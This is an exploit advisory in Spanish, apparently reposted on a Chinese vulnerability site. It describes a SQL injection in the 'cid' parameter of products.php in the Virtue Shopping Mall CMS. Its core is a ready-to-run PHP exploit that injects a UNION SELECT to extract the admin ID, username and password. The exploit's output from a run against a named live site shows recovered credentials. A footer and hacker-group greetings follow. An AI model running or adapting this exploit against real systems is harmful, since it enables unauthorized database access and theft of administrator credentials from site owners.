CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ Archivo : products.php Variable Tipo : GET valor : cid Tipo : SQL Injection URL : http://www.site.com/products.php?cid=[SQLI] Exploit : <? $web = $argv[1]; $url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1"; preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER); $info = explode(":",$salida[1][0]); echo "ID :".$info[0]."\n"; echo "Usuario : ".$info[1]."\n"; echo "Password : ".$info[2]."\n"; ?> undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/ ID :1 Usuario : admin Password : admin Gretz : C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. 100% CHILE WWW.UNDERSECURITY.NET # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论